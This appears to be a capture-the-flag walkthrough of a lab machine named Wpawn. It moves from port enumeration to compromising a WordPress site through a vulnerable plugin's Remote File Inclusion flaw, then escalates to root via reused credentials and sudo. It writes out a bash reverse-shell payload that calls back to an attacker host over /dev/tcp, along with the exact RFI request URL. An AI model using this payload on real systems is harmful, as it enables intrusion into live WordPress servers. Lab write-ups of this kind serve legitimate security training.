🐧Wpawn

192.168.84.123

Enumeration

sudo nmap 192.168.84.123 -sV -A -p-

Port 22

Banner grab

nc 192.168.84.123 22

Port 80

Running dirbuster to enumerate the website.

Found an interesting plugin being used.

There are known vulnerabilities for this plugin. https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618\

Was able to get a reverse shell using the following.

Creating text file payload.txt and pulling it with Remote File Inclusion.

<pre>system("bash -c 'exec bash -i &>/dev/tcp/192.168.49.84/9966 <&1'")</pre>
http://192.168.84.123/wordpress/wp-admin/post.php?swp_debug=load_options&swp_url=http://192.168.49.84:8000/payload.txt

Shell

Got a shell.

Found no interesting files. There is another user named takis. Dropped Linpeas in /tmp

Found credentials.

The found password works for takis' account, connected via ssh.

Running sudo -l

Root

Ran sudo su

Last updated

Was this helpful?